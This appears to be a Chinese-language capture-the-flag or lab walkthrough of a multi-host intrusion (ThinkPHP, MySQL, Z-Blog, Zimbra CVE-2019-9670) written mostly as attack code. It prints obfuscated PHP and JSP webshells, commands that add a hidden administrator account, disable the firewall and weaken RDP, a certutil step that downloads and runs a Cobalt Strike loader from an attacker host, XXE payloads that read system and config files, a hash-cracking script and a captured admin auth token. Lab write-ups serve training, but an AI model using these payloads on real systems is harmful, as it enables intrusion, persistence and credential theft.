ThinkPHP #
进入80端口,用工具直接getshell
<?php
function xorEncryptDecrypt($data, $key) {
$keyLength = strlen($key);
$result = '';
for ($i = 0; $i < strlen($data); $i++) {
$keyChar = $key[$i % $keyLength];
$result .= chr(ord($data[$i]) ^ ord($keyChar));
}
return $result;
}
$originalData = $_REQUEST["a"];
$key = $_REQUEST["b"];
$encryptedData = xorEncryptDecrypt($originalData, $key);
$decryptedData = xorEncryptDecrypt($encryptedData, $key);
echo @eval($decryptedData);
?>
//密码是a
根目录拿到flag1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
在目标 Windows 上执行以下命令,允许非 TLS、非 NLA 连接:
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0
刚进去就看到360,把他关掉吧
Mysql #
这里使用stowaway搭建代理,可以尝试出mysql的用户凭证:root/cslab,爆破的话会导致错误过多,IP被加入黑名单(这里之前可能存在提示,但是我做的时候没有)
将cs定向木马上传到ThinkPHP的目录中来下载,这里需要使用掩日做网络分离
certutil -urlcache -f -split http://172.20.57.30/Cld.exe Cld.exe
Cld.exe http://172.20.57.30/Cld.txt
拿到cs后,转发到msf上面
Z-Blog #
内网扫描到一个Zblogit
guid 24d876c8772572cf839674c5a176e41c
user cslab
pass 6e272dff11557a1e7ad35d0fdf1162c3
email null@null.com
查看源码发现哈希的生成逻辑,也就是很简单的二次MD5
import hashlib
target_hash = "6e272dff11557a1e7ad35d0fdf1162c3"
guid = "24d876c8772572cf839674c5a176e41c"
with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin1") as f:
for line in f:
password = line.strip()
inner_md5 = hashlib.md5(password.encode()).hexdigest()
final_hash = hashlib.md5((inner_md5 + guid).encode()).hexdigest()
if final_hash == target_hash:
print(f"[+] Found: {password}")
break
得出密码是admin123,进入后台上传这个主题包
- fengyijiu520/Z-Blog-: Z-Blog 后台文件上传漏洞
CVE-2019-9670 #
用fscan直接扫出来了XXE
- CVE-2019-9670:Zimbra 远程代码执行漏洞复现 | CN-SEC 中文网 当前目录建一个xml文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
然后用curl测试
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
发包得到密码
- Homework-of-Python/Zimbra_SOAP_API_Manage.py at master · 3gstudent/Homework-of-Python
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
Cookie: ZM_ADMIN_AUTH_TOKEN=0_deccfe0ee19318345a3115f64f8b6f637ac49cbe_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313735333332373330393032383b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d31303a313139303734363932383b
然后用蚁剑连接,注意添加Cookie以及忽略https证书
